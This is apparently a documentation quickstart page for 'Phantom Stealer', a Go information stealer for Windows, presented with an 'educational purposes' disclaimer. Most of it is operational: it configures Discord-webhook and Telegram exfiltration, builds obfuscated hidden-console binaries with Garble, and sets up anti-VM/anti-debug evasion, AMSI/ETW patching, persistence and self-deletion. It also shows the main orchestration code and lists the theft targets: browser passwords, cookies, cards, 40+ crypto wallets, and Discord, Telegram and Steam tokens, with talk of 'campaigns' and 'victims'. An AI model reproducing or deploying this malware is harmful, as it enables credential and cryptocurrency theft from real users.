Skip to main content
EDUCATIONAL PURPOSES ONLY - This software is provided for security research and malware analysis only. Unauthorized access to computer systems is illegal. See the Legal Notice for full terms.

Overview

Phantom Stealer is a Windows information stealer written in Go that demonstrates credential theft techniques for security research. This guide will walk you through cloning, configuring, building, and running the project.
1

Clone the Repository

First, clone the Phantom Stealer repository to your local machine:
git clone https://github.com/yourusername/phantom-stealer.git
cd phantom-stealer
Ensure you have Git installed on your system before proceeding.
2

Install Requirements

Phantom Stealer requires the following dependencies:Required:
  • Go 1.21 or higher
  • Windows OS (uses Windows-specific APIs)
  • GCC compiler (for CGO/SQLite support)
  • Git
Optional:
  • Garble for code obfuscation
  • UPX for binary compression
Install dependencies:
# Install Go dependencies
go mod tidy

# Install Garble (optional, for obfuscation)
go install mvdan.cc/garble@latest
CGO must be enabled for SQLite support. This is required for browser database decryption.
3

Configure the Stealer

Edit config/config.go to customize your build. At minimum, you must set an exfiltration method:

Basic Configuration

config/config.go
// C2 Configuration - Set your webhook/bot details
var (
    // Discord webhook - PRIMARY exfil method
    // format: https://discord.com/api/webhooks/xxxxx/yyyyy
    DiscordWebhook = "https://discord.com/api/webhooks/YOUR_WEBHOOK_HERE"

    // Telegram bot - BACKUP exfil method
    TelegramToken  = "YOUR_BOT_TOKEN"
    TelegramChatID = "YOUR_CHAT_ID" // get from @userinfobot
)

Module Configuration

Enable or disable features based on your research needs:
config/config.go
// Module Toggles
var (
    StealBrowsers  = true  // passwords, cookies, cards, history
    StealCrypto    = true  // desktop + extension wallets
    StealDiscord   = true  // discord tokens
    StealTelegram  = true  // tdata session files
    StealSteam     = true  // ssfn + config files
    TakeScreenshot = true  // png screenshot
    GrabSystemInfo = true  // hostname, ip, specs, etc

    // DANGER ZONE - these are noisier
    Persistence  = false // off by default - adds to registry/startup
    SelfDestruct = false // delete exe after run

    // Anti-analysis (recommended for prod builds)
    AntiVM    = true
    AntiDebug = true
)

Build Identification

Customize the build ID to track different campaigns:
config/config.go
var (
    BuildID   = "phantom-v1.0"
    MutexName = "phantom_mtx_7f3a9b2c" // change to avoid detection
)
At least one exfiltration method (Discord or Telegram) must be configured or the stealer will fail to send data.
4

Build the Binary

Choose a build method based on your needs:

Standard Build

Basic development build with debug symbols:
go build -o phantom.exe .

Production Build

Optimized build with stripped symbols and hidden console:
go build -ldflags "-s -w -H windowsgui" -o phantom.exe .

Obfuscated Build

For maximum stealth using Garble:
garble -literals build -ldflags "-s -w -H windowsgui" -o phantom.exe .

PowerShell Build Script

Use the included PowerShell script for automated builds:
.\build.ps1 -Output phantom.exe
The PowerShell build script automatically checks for suspicious strings in the compiled binary and provides file size optimization recommendations.
5

Run the Stealer

Execute the compiled binary on your test system:
# Direct execution
.\phantom.exe

Execution Flow

When executed, Phantom Stealer performs the following operations:
  1. Environment Checks (Phase 1)
    • VM detection (VMware, VirtualBox, Hyper-V)
    • Debugger detection
    • Sandbox detection
    • AMSI/ETW patching
  2. Persistence Installation (Phase 2 - if enabled)
    • Registry Run key installation
    • Startup folder copy
  3. Data Collection (Phase 3)
    • System reconnaissance
    • Browser credential extraction
    • Crypto wallet theft
    • Token grabbing (Discord, Telegram, Steam)
    • File grabbing from Desktop/Documents/Downloads
  4. Exfiltration (Phase 4)
    • Data archival to ZIP
    • Upload to Discord webhook
    • Fallback to Telegram if Discord fails
  5. Cleanup (Phase 5 - if enabled)
    • Self-deletion
main.go
func main() {
    // PHASE 1: Environment checks
    if config.AntiVM || config.AntiDebug {
        if !evasion.RunAntiAnalysis(config.AntiVM, config.AntiDebug) {
            os.Exit(0)
        }
    }

    // PHASE 2: Persistence (optional)
    if config.Persistence {
        persist.Install(persist.Registry)
    }

    // PHASE 3: Data collection
    data := &exfil.StealerData{
        Timestamp:  time.Now(),
        BuildID:    config.BuildID,
    }
    data.SystemInfo = recon.Collect()
    data.Browsers = browsers.StealAll()
    data.Wallets = wallets.StealAll()
    data.Tokens = tokens.StealAll()

    // PHASE 4: Exfiltration
    exfil.Exfiltrate(data)

    // PHASE 5: Cleanup
    if config.SelfDestruct {
        persist.SelfDelete()
    }
}
The stealer exits silently (no output) when anti-analysis checks detect a sandbox or debugger environment.
6

Verify Exfiltration

Check your configured webhook/bot for the stolen data:

Discord Webhook Output

You’ll receive a Discord message with:
  • System information embed (hostname, IP, OS version)
  • Statistics (passwords found, tokens, wallets)
  • ZIP archive attachment containing:
    • system_info.txt - Full system details
    • passwords.txt - Extracted browser passwords
    • cookies.txt - Browser cookies
    • tokens.txt - Discord/Telegram/Steam tokens
    • wallets/ - Crypto wallet files
    • files/ - Grabbed documents
    • screenshot.png - Desktop screenshot

Telegram Bot Output

Similar to Discord but sent via Telegram Bot API with document attachment.
Data is organized in a ZIP archive named {hostname}_{timestamp}.zip for easy identification of victims.

Targeted Resources

Browsers Supported

Chrome
Chromium
Edge
Brave
Opera
Opera GX
Vivaldi
Yandex

Crypto Wallets

Phantom targets 40+ crypto wallets including: Desktop Wallets:
  • Exodus, Electrum, Atomic, Jaxx, Coinomi, Guarda
  • Bitcoin Core, Litecoin Core, Dash Core
  • Monero, ZCash, Wasabi Wallet
Browser Extension Wallets:
  • MetaMask, Phantom, Trust Wallet, Coinbase Wallet
  • TronLink, Binance Chain, Ronin, Keplr
  • 30+ additional extension wallets

Tokens & Sessions

  • Discord: Desktop client + browser sessions (all channels)
  • Telegram: tdata session files
  • Steam: SSFN files + config.vdf

Troubleshooting

Build Failures

Ensure CGO is enabled and GCC is installed:
set CGO_ENABLED=1
# Install MinGW-w64 for GCC on Windows
Install Garble using Go:
go install mvdan.cc/garble@latest
# Ensure $GOPATH/bin is in your PATH
The SQLite driver requires CGO. Verify:
go env CGO_ENABLED
# Should output: 1

Runtime Issues

Anti-analysis checks may be triggering. Build with debug mode:
config/config.go
AntiVM    = false
AntiDebug = false
Verify webhook/bot configuration:
  • Check Discord webhook URL format
  • Verify Telegram bot token and chat ID
  • Test webhook manually with curl
DPAPI decryption requires the binary to run as the target user. Browser passwords are encrypted per-user.

Next Steps

Building Guide

Learn about advanced build options, flags, and obfuscation techniques

Core Modules

Understand the module implementations and techniques

Detection & Defense

Learn how to detect and defend against this type of malware

Configuration

Explore configuration options and targets
Remember: This tool is for educational and authorized security research only. Misuse is illegal and unethical. Always obtain explicit written permission before testing on any system.

Build docs developers (and LLMs) love

Get started for freeTalk to us